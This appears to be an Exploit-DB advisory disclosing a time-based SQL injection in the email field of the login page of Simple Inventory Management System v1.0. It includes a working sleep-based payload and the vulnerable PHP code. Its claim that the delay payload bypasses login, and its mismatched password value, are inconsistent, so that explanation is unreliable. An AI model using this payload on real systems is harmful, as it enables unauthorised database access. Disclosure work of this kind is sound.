
12 changes to exploits/shellcodes/ghdb Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS' Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure' FAQ Management System v1.0 - 'faq' SQL Injection Flashcard Quiz App v1.0 - 'card' SQL Injection Simple Inventory Management System v1.0 - 'email' SQL Injection comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset Online Shopping System Advanced - Sql Injection taskhub 2.8.7 - SQL Injection IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft
64 lines
No EOL
2 KiB
Text
64 lines
No EOL
2 KiB
Text
# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
|
|
# Google Dork: N/A
|
|
# Application: Simple Inventory Management System
|
|
# Date: 26.02.2024
|
|
# Bugs: SQL Injection
|
|
# Exploit Author: SoSPiro
|
|
# Vendor Homepage: https://www.sourcecodester.com/
|
|
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
|
|
# Version: 1.0
|
|
# Tested on: Windows 10 64 bit Wampserver
|
|
# CVE : N/A
|
|
|
|
|
|
## Vulnerability Description:
|
|
|
|
This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
|
|
|
|
|
|
## Proof of Concept (PoC):
|
|
|
|
An example attacker could input the following values:
|
|
|
|
email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
|
|
pwd: test
|
|
|
|
This would result in the following SQL query:
|
|
|
|
SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
|
|
|
|
This attack would retrieve all users, making the login process always successful.
|
|
|
|
request-response foto:https://i.imgur.com/slkzYJt.png
|
|
|
|
|
|
## Vulnerable code section:
|
|
====================================================
|
|
ims/login.php
|
|
|
|
<?php
|
|
ob_start();
|
|
session_start();
|
|
include('inc/header.php');
|
|
$loginError = '';
|
|
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
|
|
include 'Inventory.php';
|
|
$inventory = new Inventory();
|
|
|
|
// Vulnerable code
|
|
$login = $inventory->login($_POST['email'], $_POST['pwd']);
|
|
//
|
|
|
|
if(!empty($login)) {
|
|
$_SESSION['userid'] = $login[0]['userid'];
|
|
$_SESSION['name'] = $login[0]['name'];
|
|
header("Location:index.php");
|
|
} else {
|
|
$loginError = "Invalid email or password!";
|
|
}
|
|
}
|
|
?>
|
|
|
|
|
|
|
|
## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html |